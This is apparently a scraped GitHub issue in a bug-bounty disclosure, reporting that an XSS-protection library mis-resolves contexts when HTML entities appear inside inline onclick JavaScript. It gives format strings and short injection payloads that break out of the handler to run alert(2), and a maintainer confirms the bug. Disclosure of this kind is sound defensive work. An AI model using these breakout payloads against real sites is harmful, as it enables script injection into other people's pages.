We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
The library incorrectly resolves contexts with HTML-entities inside the inlined JS-code.
False Positive: Format String: <a href="#" onclick="alert("{0}");">test</a> Payload: False Positive
<a href="#" onclick="alert("{0}");">test</a>
False Positive
XSS 1: Format String: <a href='#' onclick='alert(""{0}"");'>XSS</a> Payload: +alert(2)+
<a href='#' onclick='alert(""{0}"");'>XSS</a>
+alert(2)+
XSS 2: Format String: <a href="#" onclick='alert("Tom&{0}");'>XSS?</a> Payload: quot;);alert(2);//
<a href="#" onclick='alert("Tom&{0}");'>XSS?</a>
quot;);alert(2);//
The text was updated successfully, but these errors were encountered:
The bug is confirmed. Please contact me at [email protected] to get information on receiving prizes.
Sorry, something went wrong.
kochetkov
Barkhat26
No branches or pull requests
The library incorrectly resolves contexts with HTML-entities inside the inlined JS-code.
False Positive:
Format String:
<a href="#" onclick="alert("{0}");">test</a>
Payload:
False Positive
XSS 1:
Format String:
<a href='#' onclick='alert(""{0}"");'>XSS</a>
Payload:
+alert(2)+
XSS 2:
Format String:
<a href="#" onclick='alert("Tom&{0}");'>XSS?</a>
Payload:
quot;);alert(2);//
The text was updated successfully, but these errors were encountered: